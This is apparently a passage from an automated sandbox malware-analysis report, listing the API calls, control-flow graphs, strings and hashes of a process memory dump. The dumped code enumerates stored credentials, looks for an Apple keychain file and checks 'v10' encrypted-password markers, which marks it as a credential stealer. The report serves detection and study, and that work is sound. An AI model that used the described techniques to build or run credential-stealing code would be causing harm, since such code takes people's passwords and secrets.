• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                            • API String ID: 708747863-3398334509
                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                            Control-flow Graph

                                                                            control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 593 413e79-413e9d call 413959 call 413ca4 585->593 594 413e28-413e35 585->594 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 591 413edb-413ee2 588->591 589->591 597 413ee4 591->597 598 413ee7-413efe 591->598 605 413ea2-413eae CloseHandle 593->605 595 413e61-413e68 594->595 596 413e37-413e44 GetModuleHandleW 594->596 595->593 602 413e6a-413e76 595->602 596->595 601 413e46-413e5c GetProcAddress 596->601 597->598 598->581 601->595 602->593 605->584
                                                                            APIs
                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                            • memset.MSVCRT ref: 00413D7F
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                            • memset.MSVCRT ref: 00413E07
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                            • free.MSVCRT ref: 00413EC1
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                            • CloseHandle.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                            • API String ID: 1344430650-1740548384
                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                            APIs
                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$FirstNext
                                                                            • String ID:
                                                                            • API String ID: 1690352074-0
                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041898C
                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystemmemset
                                                                            • String ID:
                                                                            • API String ID: 3558857096-0
                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                            Control-flow Graph

                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 
445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004455C2
                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                            • memset.MSVCRT ref: 0044570D
                                                                            • memset.MSVCRT ref: 00445725
                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                            • memset.MSVCRT ref: 0044573D
                                                                            • memset.MSVCRT ref: 00445755
                                                                            • memset.MSVCRT ref: 004458CB
                                                                            • memset.MSVCRT ref: 004458E3
                                                                            • memset.MSVCRT ref: 0044596E
                                                                            • memset.MSVCRT ref: 00445A10
                                                                            • memset.MSVCRT ref: 00445A28
                                                                            • memset.MSVCRT ref: 00445AC6
                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                            • memset.MSVCRT ref: 00445B52
                                                                            • memset.MSVCRT ref: 00445B6A
                                                                            • memset.MSVCRT ref: 00445C9B
                                                                            • memset.MSVCRT ref: 00445CB3
                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                            • memset.MSVCRT ref: 00445B82
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                            • memset.MSVCRT ref: 00445986
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                            • API String ID: 2263259095-3798722523
                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                            APIs
                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                            • API String ID: 2744995895-28296030
                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                            • memset.MSVCRT ref: 0040B756
                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                            • memset.MSVCRT ref: 0040B851
                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            • memset.MSVCRT ref: 0040BB53
                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                            • String ID: chp$v10
                                                                            • API String ID: 4290143792-2783969131
                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                            APIs
                                                                            • memset.MSVCRT ref: 004091E2
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                            • String ID:
                                                                            • API String ID: 3715365532-3916222277
                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                            APIs
                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                            • String ID: bhv
                                                                            • API String ID: 4234240956-2689659898
                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
